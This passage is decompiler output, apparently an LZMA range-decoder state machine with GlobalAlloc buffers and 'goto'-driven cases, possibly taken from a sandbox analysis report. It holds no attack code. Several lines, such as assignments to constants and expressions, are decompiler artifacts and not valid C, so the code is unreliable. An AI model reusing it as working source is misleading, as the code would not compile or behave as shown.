											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
